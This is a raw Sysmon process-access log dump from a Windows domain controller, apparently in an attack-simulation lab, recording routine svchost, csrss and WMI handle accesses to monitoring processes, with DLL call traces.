13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.361{59A5CD1D-8E46-6005-1600-00000000A301}15443092C:\Windows\system32\svchost.exe{59A5CD1D-8E58-6005-4000-00000000A301}3784C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wmiprvsd.dll+fa1f|C:\Windows\system32\wbem\wmiprvsd.dll+1351d|C:\Windows\system32\wbem\wmiprvsd.dll+127f4|C:\Windows\system32\wbem\wbemcore.dll+ced2|C:\Windows\system32\wbem\wbemcore.dll+d531|C:\Windows\system32\wbem\wbemcore.dll+104fe|C:\Windows\system32\wbem\wbemcore.dll+25435|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c 10341000x80000000000000001683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E58-6005-4000-00000000A301}3784C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.330{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4000-00000000A301}3784C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E58-6005-4000-00000000A301}3784C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.158{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-3F00-00000000A301}3760C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 